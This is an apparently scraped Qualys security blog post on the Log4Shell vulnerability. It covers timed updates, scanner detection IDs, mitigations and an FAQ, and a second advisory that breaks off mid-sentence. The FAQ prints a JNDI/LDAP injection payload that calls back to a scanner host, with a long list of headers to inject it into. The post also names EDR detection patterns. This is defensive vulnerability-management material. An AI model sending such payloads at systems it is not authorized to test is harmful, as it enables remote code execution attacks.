December 18, 2021 4:20 PM ET\n\n * [Two new option profiles for authenticated and unauthenticated Log4Shell scans are now added to the platform](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/new-options-profiles-for-log4shell-detection>).\n * QID for CVE-2021-45105 will be available on or before 6 PM PDT on Dec 18.\n\n#### Update \u2013 December 18, 2021 1:00 PM ET\n\nWe are aware of a third update to Log4j, v2.17 (CVE-2021-45105), and are working on building QIDs for it. We will provide an ETA by 10 PM ET today if not earlier.\n\n#### Update \u2013 December 17, 2021 4:38 PM ET\n\nAccording to reports, Log4Shell vulnerability can be exploited locally by leveraging Javascript WebSocket connection to trigger the remote code exploit (RCE).\n\nThis attack vector does significantly increase the attack surface of this vulnerability than was previously known. See details [here](<https://www.blumira.com/analysis-log4shell-local-trigger/>).\n\nThe only recommendation at this point is to update Log4j to the latest version or remove the jndi class file.\n\nAuthenticated scans at this point provide the most accurate representation of risk and attack surface.\n\n#### Update \u2013 December 17, 2021 2:06 PM ET\n\nAdded QID 376187 for Apache Log4j 1.2 Remote Code Execution Vulnerability. \n\n#### Update \u2013 December 16, 2021 6:19 PM ET\n\nUpdated dashboard\n\n#### Update \u2013 December 16, 2021 6:20 AM ET\n\nThe mitigation shared earlier has been discredited by the vendor - <https://logging.apache.org/log4j/2.x/security.html#CVE-2021-44228>. The safest thing to do is to upgrade Log4j to a safe version or remove the JndiLookup class from the log4j-core jar. Qualys has not removed the mitigation QIDs so that customers do not lose track of the progress made for it.\n\nAdded QID 376160 for a zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228) that results in remote code execution (RCE). Affected versions are Log4j versions 2.x prior to and including 2.15.0. This QID reads the file generated by the [Qualys Log4j Scan Utility](<https://github.com/Qualys/log4jscanwin>). The QID reads 1st 100000 characters from the generated output file.\n\n#### Update \u2013 December 14, 2021 8:45 PM ET\n\nLog4j discussion and Q&amp;A webinars from Monday, Dec 13 are available to [watch on demand](<https://qualys.com/log4j-webinar-2>).\n\n#### Update \u2013 December 14, 2021 2:10 PM ET\n\n * Windows Detection added to QID: 376157 with version 2.5.354-2\n * Remote QID 730297 updated to include additional payloads with LDAPS, RMI, DNS, IIOP, NIS, NDS, HTTP, CORBAL with version 2.5.354-2\n\n#### Update \u2013 December 13, 2021 3:30 PM ET\n\nAdded QIDs 178935, 178934, 317118, 317114, 317117, 317115 and 690737 to address Log4j vulnerability\n\n#### Update \u2013 December 13, 2021 2:00 PM ET\n\nAdded information related to expediting testing for CVE-2021-44228 using Qualys WAS\n\n#### Update \u2013 December 13, 2021 1:00 PM ET\n\nAdded QIDs 45514 and 48199 to address Log4j vulnerability\n\nQID 376157 updated to not post vulnerability on Log4j API installations\n\n#### Update \u2013 December 13, 2021 11:39 AM ET\n\nAdded information related to IG QIDs which can be used to detect assets where mitigations are applied\n\n#### **Update \u2013 December 12, 2021 8:54 PM ET**\n\nAdded information related to remediating Log4j vulnerability using Qualys Patch Management\n\n#### **Update \u2013 December 12, 2021 4:30 PM ET**\n\nAdded information related to mitigation controls along with specific QIDs that will help detect assets with mitigation controls applied\n\n#### **Update \u2013 December 12, 2021 10:30 AM ET**\n\nThe Qualys Security Operations team has conducted a detailed investigation of our platforms to determine the vulnerable versions of Log4j needing remediation. We have implemented multiple measures for mitigation which include:\n\n 1. Rolling out latest version of Log4j where applicable, or making configuration changes on the confirmed hosts.\n\n2\\. Configuration of custom rules to intercept and drop malicious web requests.\n\n3\\. Blocking known IoCs available via threat feeds and research.\n\n4\\. Signatures updates to perimeter security solutions like IPS/WAF to block any exploit attempts on our platforms.\n\n#### **Update **\u2013 ** **December**** **11, 2021** 11:30 PM ET\n\n * WAS QID 150440 was released to customers along with VULNSIGS-2.5.352-4.\n * QID 376157 was updated to look for vulnerable installs using locate and ls proc commands\n\n* * *\n\nAn exploit for a [critical zero-day vulnerability](<https://logging.apache.org/log4j/2.x/security.html>) affecting Apache Log4j2 known as Log4Shell was disclosed on December 9, 2021. All versions of Log4j2 versions &gt;= 2.0-beta9 and &lt;= 2.15.0 are affected by this vulnerability. This vulnerability is actively being exploited in the wild.\n\nLog4j2 is a ubiquitous library used by millions for Java applications. Created by Ceki G\u00fclc\u00fc, the library is part of the Apache Software Foundation&#x27;s Apache Logging Services project.\n\nThe vulnerability, when exploited, results in remote code execution on the vulnerable server with system-level privileges. As a result, it is rated at CVSS v3 score of 10.0.\n\nApache Log4j2 version 2.16.0 fixes this vulnerability. \n\nWe are continuously monitoring all our environments for any indication of active threats and exploits. With these measures, we are confident that necessary mitigations and remediation are in place to block and prevent any exploits of Log4j RCE and there is no impact on Qualys scanners, Cloud Agent, QGS, systems or customer data. We will continue to monitor our environment round the clock and implement additional measures as required. \n\n## Qualys Coverage\n\nThe Qualys Research Team has released both unauthenticated and authenticated QIDs to address this vulnerability. These QIDs will be available starting with vulnsigs version VULNSIGS-2.5.352-3 and in Cloud Agent manifest version lx_manifest- 2.5.352.3-1\n\n**QID**| **Title**| **Version**| **Available for** \n---|---|---|--- \n376157| Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell)| VULNSIGS-2.5.352-3 / 2.5.352.3-2| Scanner, Cloud Agent \n730297| Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell) (Unauthenticated)| VULNSIGS-2.5.352-3| Scanner \n150440| Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228)| VULNSIGS-2.5.352-3| WAS \n178935| Debian Security Update for apache-log4j2 (DLA 2842-1)| VULNSIGS-2.5.353-2 / 2.5.353.2-1| Scanner, Cloud Agent \n178934| Debian Security Update for apache-log4j2 (DSA 5020-1)| VULNSIGS-2.5.353-2 / 2.5.353.2-1| Scanner, Cloud Agent \n317114| Cisco Secure Web Appliance Log4j Remote Code Execution (RCE) Vulnerability (CSCwa47278)| VULNSIGS-2.5.353-2| Scanner \n317118| Cisco Application Policy Infrastructure Controller (APIC) Apache Log4j Vulnerability (cisco-sa-apache-log4j-qRuKNEbd)| VULNSIGS-2.5.353-2| Scanner \n317117| Cisco Integrated Management Controller (IMC) Apache Log4j Vulnerability (cisco-sa-apache-log4j-qRuKNEbd)| VULNSIGS-2.5.353-2| Scanner \n317115| Cisco SD-WAN Log4j Remote Code Execution (RCE) Vulnerability (CSCwa47745)| VULNSIGS-2.5.353-2| Scanner \n198604| Ubuntu Security Notification for Apache Log4j 2 Vulnerability (USN-5192-1)| VULNSIGS-2.5.356-2 / 2.5.356.2-1| Scanner, Cloud Agent \n376178| Apache Log4j Remote Code Execution (RCE) Vulnerability (CVE-2021-45046)| VULNSIGS-2.5.356-2 / 2.5.356.2-1| Scanner, Cloud Agent \n376160| Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell) Detected Based on Qualys Log4j scan Utility| VULNSIGS-2.5.356-4 / 2.5.356.4-3| Scanner, Cloud Agent \n198606| Ubuntu Security Notification for Apache Log4j 2 Vulnerability (USN-5197-1)| VULNSIGS-2.5.357-4 / 2.5.357.4-3| Scanner, Cloud Agent \n216275| VMware vCenter Server 7.0 Apache Log4j Remote Code Execution (RCE) Vulnerability (VMSA-2021-0028)| VULNSIGS-2.5.357-4| Scanner \n216276| VMware vCenter Server 6.7 Apache Log4j Remote Code Execution (RCE) Vulnerability (VMSA-2021-0028)| VULNSIGS-2.5.357-4| Scanner \n216277| VMware vCenter Server 6.5 Apache Log4j Remote Code Execution (RCE) Vulnerability (VMSA-2021-0028)| VULNSIGS-2.5.357-4| Scanner \n282110| Fedora Security Update for log4j (FEDORA-2021-f0f501d01f)| VULNSIGS-2.5.357-4 / 2.5.357.4-3| Scanner, Cloud Agent \n317119| Cisco Firepower Threat Defense (FTD) software Vulnerability in Apache Log4j (cisco-sa-apache-log4j-qRuKNEbd)| VULNSIGS-2.5.357-4| Scanner \n376184| VMware Identity Manager (vIDM) and Workspace ONE Access Apache Log4j Remote Code Execution (RCE) Vulnerability (VMSA-2021-0028)| VULNSIGS-2.5.357-4 / 2.5.357.4-3| Scanner, Cloud Agent \n376183| VMware NSX-T Apache Log4j Remote Code Execution (RCE) Vulnerability (VMSA-2021-0028)| VULNSIGS-2.5.357-4 / 2.5.357.4-3| Scanner, Cloud Agent \n376185| DataDog Agent Log4j Remote Code Execution (RCE) Vulnerability| VULNSIGS-2.5.357-5 / 2.5.357.5-4| Scanner, Cloud Agent \n376187| Apache Log4j 1.2 Remote Code Execution Vulnerability| VULNSIGS-2.5.357-5 / 2.5.357.5-4| Scanner, Cloud Agent \n730301| Apache Solr Affected By Apache Log4J Vulnerability (Log4Shell)| VULNSIGS-2.5.357-8| Scanner \n150441| Forms Vulnerable to Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228)| VULNSIGS-2.5.357-8| WAS \n376193| Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell) Detected Based on Qualys Log4j scan Utility (CVE-2021-45046)| VULNSIGS-2.5.357-8 / 2.5.357.8-7| Scanner, Cloud Agent \n376194| Apache Log4j Denial of Service (DOS) Vulnerability (Log4Shell)| VULNSIGS-2.5.357-9 / 2.5.357.9-8| Scanner, Cloud Agent \n376195| Apache Log4j Denial of Service (DOS) Vulnerability (Log4Shell) Detected Based on Qualys Log4j scan Utility| VULNSIGS-2.5.357-9 / 2.5.357.9-8| Scanner, Cloud Agent \n178945| Debian Security Update for apache-log4j2 (DSA 5024-1)| VULNSIGS-2.5.359-2 / 2.5.359.2-1| Scanner, Cloud Agent \n198613| Ubuntu Security Notification for Apache Log4j 2 Vulnerability (USN-5203-1)| VULNSIGS-2.5.359-2 / 2.5.359.2-1| Scanner, Cloud Agent \n282173| Fedora Security Update for log4j (FEDORA-2021-017d19088b)| VULNSIGS-2.5.359-2 / 2.5.359.2-1| Scanner, Cloud Agent \n751506| OpenSUSE Security Update for log4j (openSUSE-SU-2021:1577-1)| VULNSIGS-2.5.359-2 / 2.5.359.2-1| Scanner, Cloud Agent \n751493| OpenSUSE Security Update for log4j (openSUSE-SU-2021:4107-1)| VULNSIGS-2.5.359-2 / 2.5.359.2-1| Scanner, Cloud Agent \n751499| OpenSUSE Security Update for log4j (openSUSE-SU-2021:4094-1)| VULNSIGS-2.5.359-2 / 2.5.359.2-1| Scanner, Cloud Agent \n376192| Elasticsearch Logstash Log4j Remote Code Execution (RCE) Vulnerability| VULNSIGS-2.5.359-2 / 2.5.359.2-1| Scanner, Cloud Agent \n751496| OpenSUSE Security Update for log4j (openSUSE-SU-2021:1586-1)| VULNSIGS-2.5.359-2 / 2.5.359.2-1| Scanner, Cloud Agent \n751524| OpenSUSE Security Update for log4j12 (openSUSE-SU-2021:4112-1)| VULNSIGS-2.5.359-2 / 2.5.359.2-1| Scanner, Cloud Agent \n751525| OpenSUSE Security Update for log4j (openSUSE-SU-2021:4111-1)| VULNSIGS-2.5.359-2 / 2.5.359.2-1| Scanner, Cloud Agent \n751508| OpenSUSE Security Update for log4j (openSUSE-SU-2021:3999-1)| VULNSIGS-2.5.359-2 / 2.5.359.2-1| Scanner, Cloud Agent \n751523| SUSE Enterprise Linux Security Update for log4j (SUSE-SU-2021:4115-1)| VULNSIGS-2.5.359-2 / 2.5.359.2-1| Scanner, Cloud Agent \n751522| SUSE Enterprise Linux Security Update for log4j (SUSE-SU-2021:4111-1)| VULNSIGS-2.5.359-2 / 2.5.359.2-1| Scanner, Cloud Agent \n \n \n\n## Detecting Mitigations\n\nQualys customers can leverage output following QIDs to detect if **log4j2.formatMsgNoLookups** property is set.\n\n45241 - UNIX Daemon/Services Listed Under Root User\n\n45240 - UNIX Daemon/Services Listed Under Non-Root Users\n\n\n\nQualys customers can also leverage output following QIDs to detect if **LOG4J_FORMAT_MSG_NO_LOOKUPS is **set to true\n\nQID: 48196 Windows Host Environment Variables Detected \n\nQID: 115041 Unix Environment Variables\n\n\n\n## **Discover Log4j packages Using Qualys CSAM**\n\nTo secure your infrastructure from Log4J vulnerability, first you need to get in-depth visibility into all the software components that are vulnerable. Identification and updating these components will reduce the attack surface of your infrastructure.\n\nLog4J is installed explicitly, or it can be included in a java application as a transitive dependency with common java libraries. If Log4j is installed explicitly or is in the class path of a running java application, then Qualys CSAM will inventory it and we can currently show you where Log4j is present within your environment.\n\nQualys CSAM makes it easy to identify assets containing Log4j. Please use the following QQL query to identify such assets.\n\nQuery: software:(name:\u201clog4j\u201d or name:\u201cliblog4j2\u201d)\n\nWhen searching for log4j in Qualys CSAM, please understand that log4j could be renamed and installed with different prefixes such as but not limited to: log4j2-java or liblog4j2 or log4j2 etc. There could be many different variations of this file being named. Currently, QQL search would show results only for exact match and not prefix/suffix. We are also actively working to improve the QQL token software:(name:) to work with prefix and suffix.\n\n\n\n#### Default rule to tag all software using Log4j\n\nPlease note that a new rule will be automatically published in your Qualys CSAM account to list and tag all the software applications that are vulnerable or potentially vulnerable due to use of vulnerable Log4J component. This rule takes into consideration an extensive list of all software applications, utilities created by vendors like Microsoft, Cisco, RedHat, Juniper, Dell, HPE, BMC, Oracle, Riverbed, Siemens, Phillips, NetApp, etc. This rule will be continuously updated to reflect latest status as vendors are releasing new patches to their upgrade log4j version. The rule named \u201cApps with Log4j \u2013 potentially vulnerable\u201d will be disabled by default and needs to be enabled explicitly.\n\nOnce the hosts containing vulnerable software are identified, they can be grouped together with a \u2018dynamic tag\u2019, let us say \u2013 \u201cLog4j\u201d. This helps in automatically grouping existing hosts with the above vulnerabilities as well as any new assets that spin up in your environment. Tagging makes these grouped assets available for querying, reporting, prioritizing, scanning and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n#### Dedicated Inventory Dashboard\n\nTo help you quickly find out vulnerable hosts and software, a new dashboard is created in Qualys CSAM. This dashboard has very useful widgets listing all the vulnerable hosts, applications with vulnerable versions of log4j, and most importantly all the vulnerable hosts visible on the Internet. Dedicated widgets with names \u2018External Attack Surface\u2019 populate all vulnerable hosts that are visible on [Shodan](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) and are low-hanging opportunities for attackers. These widgets also list workloads hosted on shared cloud infrastructure and that have public IP addresses. All the apps containing log4j, in which the default bundled version of log4j is vulnerable, are listed as \u2018potentially vulnerable apps\u2019.\n\n\n\n## **Discover Vulnerable Log4j packages Using Qualys VMDR**\n\nYou can see all your impacted hosts for this vulnerability in the vulnerabilities view by using QQL query\n\nvulnerabilities.vulnerability.qid:[`730297`,`376157`]\n\n \n\n## **Prioritize Based on RTIs**\n\nUsing VMDR, the Log4j vulnerabilities can be prioritized using the following real-time threat indicators (RTIs):\n\n * Predicted_High_Risk\n * Wormable\n * Remote_Code_Execution\n * Unauthenticated_Exploitation\n\n## \n**Detect Impacted Assets with Threat Protection**__\n\nVMDR also enables you to automatically map assets vulnerable to these vulnerabilities using [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>).\n\n\n\n## **Remediate Using Qualys Patch Management**\n\nRemediating this vulnerability is not straightforward as the vulnerability is a library that is used by a Java application. As such, Qualys Patch Management can be used for different types of remediations which depend on the specific vulnerable Java application.\n\n * In case the vendor of the Java application releases a patch, customers can use Qualys Patch Management to deploy the patch. Updating the version is not possible.\n * Customers can use Qualys patch management to remove the JndiLookup.class as recommended by Apache Log4j (<https://logging.apache.org/log4j/2.x/>) from the log4j jar. To do so, customers can create a pre action to execute the following command as recommended by Apache Log4j: \u201czip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\u201d\n * Customers can use the pre actions to create an action that will replace the old log4j jar with the 2.16.0 jar.\n * In more complex situations, pre actions can be used to update the environment variables or system properties as suggested by Apache Log4j\n * Note that it is highly likely that a reboot will be needed after the changes recommended above are applied. We recommend utilizing the pre action ability to force a reboot to ensure the application has been restarted.\n\n## **Dashboard**\n\nWith VMDR Dashboard, you can track this vulnerability, its impacted hosts, their status, and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the \u201cLog4j\u201d Dashboard.\n\n[QLYS-Apache_Log4J2___Global_Insights](<https://blog.qualys.com/wp-content/uploads/2021/12/QLYS-Apache_Log4J2___Global_Insights.zip>)[Download](<https://blog.qualys.com/wp-content/uploads/2021/12/QLYS-Apache_Log4J2___Global_Insights.zip>)\n\n\n\n## **Free 30-Day VMDR Service**\n\nTo help security teams assess and mitigate their risk exposure to the Log4j vulnerabilities (Log4j), Qualys is offering an [integrated VMDR service](<https://www.qualys.com/forms/vmdr/>) free for 30 days to identify vulnerable assets.\n\n## **Detecting the Vulnerability with Qualys WAS**\n\nFor details on Qualys WAS Log4Shell detection, please refer to: <https://blog.qualys.com/vulnerabilities-threat-research/2021/12/15/is-your-web-application-exploitable-by-log4shell-cve-2021-44228-vulnerability>\n\n\n\nQualys WAS Research team has released 150440 QID to production in order to detect the web applications vulnerable to apache log4j2 zero-day vulnerability (CVE-2021-44228). \n\nOn affected versions of Log4j, a zero-day vulnerability exists in JNDI (Java Naming and Directory Interface) features, which was made public on December 9, 2021 that results in remote code execution (RCE).\n\nThe WAS module is using our Out Of Band detection mechanism to inject payloads into the following headers listed below. The following request headers will be tested:\n\n 1. X-Api-Version\n 2. User-Agent\n 3. Referer\n 4. X-Druid-Comment\n 5. Origin\n 6. Location\n 7. X-Forwarded-For\n 8. Cookie\n 9. X-Requested-With\n 10. X-Forwarded-Host\n 11. Accept\n\nWe are working on other headers and will update our signatures as needed. \n\nThe above headers will be tested at the base URl and several directories up and down (adhering to scope rules) to ensure each application is thoroughly tested.\n\nAs part of the test to detect the presence of the vulnerability WAS engine sends a HTTP GET request with a specially crafted payload inside Request headers, where vulnerable servers will make a DNS query that will trigger Qualys Periscope detection mechanism.\n\nSuccessful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the target system.\n\nUnique payloads between the DNS server and our web server will confirm the requests, making this technique very accurate in identifying the vulnerability.\n\nGiven the detection mechanism and payload confirmation, there is no room for false positives in this approach.\n\nQID 150440 has been added to the WAS Core Detection Scope, so all scans using the Core detection will include this QID in scanning as well. However, to expedite testing for CVE-2021-44228 across all of your web applications, it is recommended that you create a new scanning Option Profile to limit testing to only this specific vulnerability. This can be done by creating a new Option Profile and selecting &quot;Custom Search Lists&quot; under the Detection Scope to create a new static list. \n\n\n\nComplete the creation wizard and add QID 150440 to the Static Search List.\n\n\n\nAdditionally, we recommend limiting the scan to between 50 and 100 links in scope maximum.\n\n\n\nScanning with this option profile will achieve two things to expedite testing your web applications in the most efficient way possible. First, we are only testing for one specific vulnerability, QID 150440. Second, as this vulnerability is only tested at the base URI and several directories up and down as appropriate, there is no need to crawl and test every link in the application. These two changes will allow each web application to be scanned faster than full Core detection scans while still providing you the necessary visibility of any vulnerable versions of Log4j2.\n\n\n\n## **Detecting Exploits &amp; Malware with Qualys Multi-Vector EDR**\n\nQualys Multi-Vector EDR will detect exploits, malware, and Indicators of Compromise (IOC) associated with Log4Shell and will be continually updated as more are discovered in the following months.\n\nMulti-Vector EDR collects endpoint telemetry and will flag suspicious activity associated with the vulnerability:\n\n 1. Detects java.exe processes with an LDAP network connection\n 2. Search for Log4J Vulnerabilities by collecting and inventorying all .jar files on a system\n 3. Detect internal lateral movement attempts by flagging on curl.exe and Log4J payloads\n 4. Detect java.exe process that spawn unusual child processes\n\n## **Detect Exploitation Attempts with Qualys XDR (beta)**\n\n[XDR](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/14/detect-exploitation-attempts-with-qualys-xdr-beta>) (currently in Beta) can detect evidence of exploits across the network\n\n 1. Search for Log4J exploit attempts using QQL\n 2. Create alert notification rule based on the QQL using Rule Editor\n 3. Search for Command &amp; Control connections (IP Addresses &amp; Domains) interactively via QQL and automatically via threat intelligence feed integration\n\n## Webinar: Qualys&#x27; Response to the Log4Shell Vulnerability\n\nPlease join Qualys for a Q&amp;A and discussion on the Apache Log4j2 vulnerability.\n\n * Monday, December 13, at 10:00 am Pacific Time. Register at <https://qualys.com/log4j-webinar>.\n * Monday December 13, at 2:00 pm Pacific Time. Register at <https://qualys.com/log4j-webinar-2>.\n\n## **Vendor References**\n\n * <https://logging.apache.org/log4j/2.x/security.html>\n\n## **Frequently Asked Questions ******\n\n### **What versions of Log4j are affected?**\n\nAll versions of Log4j from 2.0-beta9 to 2.15.0 are affected by this vulnerability.\n\n### **When will the QIDs be available?**\n\nThe QIDs will be released at 11 PM ET on Dec 10th, 2021. And will be part of vulnsigs version VULNSIGS-2.5.352-3 and in Cloud Agent manifest version lx_manifest- 2.5.352.3-1\n\n### **What is the detection logic for QID: 730297?**\n\nQID 730297 is a remote unauthenticated check. It sends a HTTP GET to the remote web server and tries to inject the payload\n\n`${jndi:ldap://<SCANNER_IP>:<SCANNER_PORT>/QUALYSTEST}`\n\nto exploit the vulnerability to receive a connection back to the scanner.\n\nFollowing are the parameters that the QID tries to inject payload:\n\n * X-Api-Version\n * User-Agent\n * Cookie\n * Referer\n * Accept-Language\n * Accept-Encoding\n * Upgrade-Insecure-Requests\n * Accept\n * upgrade-insecure-requests\n * Origin\n * Pragma\n * X-Requested-With\n * X-CSRF-Token\n * Dnt\n * Content-Length\n * Access-Control-Request-Method\n * Access-Control-Request-Headers\n * Warning\n * Authorization\n * TE\n * Accept-Charset\n * Accept-Datetime\n * Date\n * Expect\n * Forwarded\n * From\n * Max-Forwards\n * Proxy-Authorization\n * Range,\n * Content-Disposition\n * Content-Encoding\n * X-Amz-Target\n * X-Amz-Date\n * Content-Type\n * Username\n * IP\n * IPaddress\n * Hostname\n * X-CSRFToken\n * X-XSRF-TOKEN\n * X-ProxyUser-Ip\n\nAdditionally, payloads are now also included:\n\n * In the body of a request\n * In place of the request method\n * In place of the URI\n\n### **Under what situations would QID 730297 not detect vulnerability?**\n\nQID 730297 tries to exploit the vulnerability via the parameters mentioned above. If the application is not logging any one of the parameters mentioned above, the QID will not be detected.\n\n### **What is the detection logic for QID: ****376157****?**\n\nQID 376157 is an authenticated check. This detection is based on querying the OS package managers on the target. If the target has a log4j package with a version less than 2.15.0, the target is flagged as vulnerable.\n\nUpdate \u2013 Dec 11th 11:30pm EST\n\nWe have added 2 additional updates to the QID. We have updated the logic to find the log4j installs using the locate command. We have also updated the logic to identify the Log4j running process using the ls proc command. These updates are in VULNSIGS-2.5.352-4.\n\nUpdate \u2013 December 14, 2021 2:10 PM ET \n\nWe have updated the detection logic for QID 376157 to support Windows Operating System. The detection logic for Windows uses WMI to enumerate the running process and identifies log4j included in a process via the command line.\n\nThe QID 376157 is a version based check. Please note that mitigation is not equal to remediation and if customers have put mitigation controls in place but still have a vulnerable version of Log4j, Qualys would continue to flag the QID 376157 on their system. The mitigation QID is provided so that customers can get a better understanding of their environment. It should be not considered as a replacement for patching.\n\n### **Under what situations would QID ****376157 ****not detect vulnerability?**\n\nQID 376157 leverages the OS package manager to identify vulnerable Log4j packages. If the target does not have the vulnerable log4j package installed via the package manager, this QID might not get detected. This would typically happen when an application bundles the Log4j library in a jar etc.\n\nPlease run rpm-qa OR equivalent on the target and see if log4j is registered. Please note that if log4j is not in the output, Qualys would not flag the QID. Qualys is actively investigating other options to identify this vulnerability. We would continue to update [this blog](<http://web.archive.org/web/20211214210154/https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell>) as we make progress.\n\nIf log4j is installed with OS package manager (i.e coming in the output of rpm -qa) and QID is still not detected, we need to run a debug scan to identify why QID it\u2019s not getting flagged. Please refer to the below link for steps to run debug scan. [https://success.qualys.com/support/s/article/000001825](<http://web.archive.org/web/20211214210154/https://success.qualys.com/support/s/article/000001825>) with [Qualys Support](<http://web.archive.org/web/20211214210154/https://www.qualys.com/support/>).\n\n_Update \u2013 Dec 11th 11:30pm EST_\n\nIf access to /proc/*/fd is restricted or if log4j is embedded inside other binaries, such as jar, war ect.. or lof4j jar filename doesn\u2019t have file version, this QID may not be detected. \nAlso, if locate command is not available on the target this QID might not be detected.\n\nUpdate \u2013 December 14, 2021 2:10 PM ET \n\nOn Windows systems, the QID leverages WMI to identify log4j instances. If access to WMI is restricted or log4j is embedded inside other binaries, such as jar, war, etc. or log4j jar filename doesn\u2019t have file version, this QID may not be detected.\n\n### **What is the difference between the QID 730297 and QID ****376157****?**\n\nQID 730297 is a remote unauthenticated QID and **376157 **is an authenticated QID.\n\n### **Does Qualys WAS have a detection?**\n\n_Update - Dec 11th 11:30pm EST_\n\nYes! Qualys WAS has the following QID: 150440 with VULNSIGS-2.5.352-4\n\n### What should customers do if there are false negatives for remote detection QID 730297 on higher ports?\n\nWe recommend allowing bidirectional communication between scanner and target on all ports. At the time of the scan, the scanner is scanning multiple IP addresses. So for each IP, it scans it provides a unique port (usually a high number port) to connect back to. Once the scanner gets the connection back from the target to the high port it confirms the vulnerability.\n\nWhich port the target will connect back to is not known ahead of the scan. Hence the communication between the scanner and targets needs to be white-listed in both directions.\n\n### When will authenticated detection Windows be available?\n\nQID 376157 is updated to support Windows Operating with version** **VULNSIGS-2.5.354-2 QAGENT-SIGNATURE-SET-2.5.354.2-1\n\n### What are the ports on which Remote QID would be flagged?\n\nQID would be tested and flagged (if found vulnerable) on any port (Included in the scan) where the Webservice is running.\n\n### Is log4j-api also vulnerable?\n\nNo, Apache maintainers updated the [advisory](<https://logging.apache.org/log4j/2.x/security.html>) to confirm that only log4j-core is vulnerable, We have updated our signatures to accommodate this change in VULNSIGS-2.5.353-2.\n\n### Does QID 376157 check for the Log4j1.x version as well?\n\nNo, Vulnerability for Log4j 1.x is tracked via CVE-2021-4104. This blog would be updated as we release new QIDs for the same.\n\n#### Update \u2013 December 17, 2021 2:06 PM ET\n\nAdded QID 376187 for Apache Log4j 1.2 Remote Code Execution Vulnerability. \n\n### **Would Qualys update/release more QIDs for this vulnerability?**\n\nYes. We expect more QIDs will be created for this CVE as more vendors release updates for this vulnerability. Also, we expect more updates to QID 376157 and 730297.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T19:30:11", "type": "qualysblog", "title": "CVE-2021-44228: Apache Log4j2 Zero-Day Exploited in the Wild (Log4Shell)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-10T19:30:11", "id": "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-04T10:37:30", "description": "On December 09, 2021, a critical remote code execution vulnerability was identified in Apache Log4j2 after proof-of-concepts were leaked publicly, affecting Apache Log4j 2.x &lt;= 2.15.0-rc1. The vulnerability is being tracked as CVE-2021-44228 with CVSSv3 10 score and affects numerous applications which are using the Log4j2 library.\n\nSuccessful exploitation of this vulnerability could allow a remote attacker to download and execute arbitrary code on the target system. With the vulnerability being actively exploited in the wild, considering the gravity of the situation, [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) has released **QID 150440**, **150441** which sends specially crafted requests to the target server to detect vulnerable web application instances using the Log4j2 library. Once successfully detected, users can remediate the vulnerability by upgrading to **Apache Log4j** **2.17.1**.\n\nOn December 14, 2021, [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>) was published to address the deficiencies in CVE-2021-44228. Later it was also identified that under non-default configuration Apache Log4j 2.15.0 could allow an attacker to exfiltrate data and achieve remote code execution (RCE). Qualys WAS team is working on improvements to our detections.\n\nOn December 27, 2021, **[Log4j 2.17.1](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.17.1>)** was released to patch a new arbitrary code execution vulnerability discovered in version 2.17.0. The vulnerability is tracked as [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) and affects versions 2.0-alpha7 to 2.17.0 excluding security fix releases 2.3.2 and 2.12.4.\n\n### About CVE-2021-44228\n\nApache Log4j is an extremely popular java library used by application developers to log data, this logging functionality helps with debugging issues and security incidents. The logged untrusted data could be errors such as exception traces, authentication failures, and other unpredicted vectors of user input. If the data contains a certain payload, the JNDI lookup method triggers and executes arbitrary code from attacker-controlled servers leading to Remote Code Execution Vulnerability.\n\n#### Vulnerability analysis\n\nIn Log4j2 the [lookups](<https://logging.apache.org/log4j/log4j-2.3/manual/lookups.html>) functionality gives the user the ability to add values to the configuration at arbitrary places with ease of maintaining the format. There are multiple lookup methods such as Map Lookup, Environment Lookup, Context Map Lookup, etc.\n\nThe vulnerability was introduced in Log4j2 version 2.0-beta9 when the \u201cJNDILookup plugin\u201d was added as part of lookup methods to the [library](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.0-beta9>). As per official 